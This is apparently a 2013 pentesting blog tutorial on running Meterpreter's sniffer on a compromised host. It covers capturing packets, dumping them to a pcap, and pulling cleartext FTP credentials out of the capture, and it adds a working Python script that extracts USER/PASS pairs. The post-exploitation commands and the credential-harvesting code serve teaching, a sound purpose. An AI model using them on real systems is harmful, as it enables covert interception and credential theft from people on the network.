Monday, February 4, 2013

Sniff your PWNED Hosts

When you eat a cinnamon roll, don't you save the center for last? Lick a Tootsie Pop for the chocolate in the middle? Attack (pentest) a host so you can get at the internal network behind it?

If you answered yes, then you'll enjoy this quick post. We'll be using a Meterpreter extension, sniffer, which captures packets on the compromised host's network interfaces and hands them back to you as a pcap file. Let's assume you've already compromised your target and have a Meterpreter session open.

Step 1 – Enable the extension = load sniffer. Then list the interfaces the host can capture on = sniffer_interfaces; the [interface] argument in every step below is the numeric ID from that list, not the interface name.

 image

Step 2 – Start sniffing = sniffer_start [interface] [packet buffer]. The packet buffer is the maximum number of packets held on the target (it defaults to 50000); the capture lives in memory on the target, nothing is written to its disk.

image

Step 3 – Check statistics = sniffer_stats [interface]. This reports how many packets and bytes are sitting in the buffer so far.

image

Step 4 – Generate some traffic. From another machine, log into the compromised host over FTP; we use FTP to keep it simple, and because it sends the username and password in cleartext. Then run sniffer_stats again to confirm the counters increment.

image

Notice the packet and byte counts have increased:

image

Step 5 – Dump the capture to a pcap file = sniffer_dump [interface] [filename]. The file is written on your attack box, not on the target.

image

Step 6 – Open the downloaded pcap in Wireshark and look for sensitive information. For our FTP login, the display filter ftp shows the USER and PASS commands in cleartext, and Follow TCP Stream on the control connection gives you the whole conversation.

image

Step 7 – Stop the sniffer = sniffer_stop [interface]. If you don't need what is still in the buffer, sniffer_release [interface] frees it on the target.

image
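Step 6 is where the payoff is, so here is an added example (my own code, not from the original post or from Metasploit) that does that step without Wireshark: a small Python script that parses a classic libpcap file of the kind sniffer_dump writes and pulls the FTP USER and PASS commands out of it. The capture it runs on by default is constructed inline (a made-up FTP login from 10.0.0.5 to 10.0.0.20 plus one HTTP request as noise), not a real dump; pass the path of your own pcap as the first argument to run it on real output. It handles Ethernet/IPv4/TCP only and assumes segments arrive in order, which is enough for an FTP control channel on a LAN but not a substitute for Wireshark's reassembly.

```python
import struct
import sys

# --- Constructed sample input (not a real capture) ------------------------
def _tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Build an Ethernet/IPv4/TCP frame. Checksums are left zero: the parser
    below reads header fields only and never validates them."""
    eth = b"\x00" * 12 + b"\x08\x00"                 # zero MACs, EtherType IPv4
    ip_total = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_total, 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_sample_capture():
    """A libpcap (Ethernet) file with one cleartext FTP login plus noise,
    shaped like what sniffer_dump hands back. Hosts and creds are made up."""
    frames = [
        _tcp_frame("10.0.0.5", "10.0.0.20", 40001, 21, b"USER backup\r\n"),
        _tcp_frame("10.0.0.20", "10.0.0.5", 21, 40001, b"331 Password required\r\n"),
        _tcp_frame("10.0.0.5", "10.0.0.20", 40001, 21, b"PASS Winter2013!\r\n"),
        _tcp_frame("10.0.0.5", "10.0.0.20", 40002, 80, b"GET / HTTP/1.0\r\n\r\n"),
    ]
    # global header: magic, version 2.4, tz 0, sigfigs 0, snaplen 65535, linktype 1
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1359936000 + i, 0, len(frame), len(frame))
        out += frame
    return out


# --- Minimal libpcap / Ethernet / IPv4 / TCP parsing ----------------------
def iter_frames(pcap):
    """Yield each captured frame from a classic libpcap file (not pcapng)."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a libpcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, payload), or None if the frame
    is not IPv4/TCP. VLAN tags, IPv6 and IP fragments are not handled."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[16:18])[0]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    tcp = frame[14 + ihl:14 + total_len]          # slicing by total_len drops Ethernet padding
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_off:]


def extract_ftp_logins(pcap):
    """Concatenate client->server bytes on port 21 per connection (segments
    are assumed to arrive in order) and pull out USER/PASS commands."""
    streams = {}
    for frame in iter_frames(pcap):
        parsed = parse_tcp(frame)
        if parsed is None or parsed[3] != 21:      # only traffic to the FTP control port
            continue
        src, dst, sport, _dport, payload = parsed
        streams[(src, sport, dst)] = streams.get((src, sport, dst), b"") + payload
    logins = []
    for (src, sport, dst), data in streams.items():
        user = password = None
        for line in data.split(b"\r\n"):
            if line[:5].upper() == b"USER ":
                user = line[5:].decode("ascii", "replace")
            elif line[:5].upper() == b"PASS ":
                password = line[5:].decode("ascii", "replace")
        if user is not None:
            logins.append({"client": src, "server": dst, "user": user, "password": password})
    return logins


if __name__ == "__main__":
    # With no argument, run against the constructed sample above.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_capture()
    for login in extract_ftp_logins(data):
        print(login)
```

The same pattern (filter on a port, glue the client side of each connection together, grep for the protocol's login verbs) works for Telnet, POP3 and HTTP Basic auth, which is really the point of Step 6: anything that crosses a pwned host's interface in cleartext is yours.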

This is a very simple example, but think of the possibilities: any protocol that crosses a compromised host's interface in cleartext (FTP, Telnet, HTTP, POP3) is now yours to read. We tend to have a warm and fuzzy feeling inside our networks because we're behind a firewall with layers of security, but none of those layers see a capture that runs on a host that has already been owned. As you'll see in later posts, there are other attacks that pivot from your compromised hosts. Again, comments and suggestions welcome.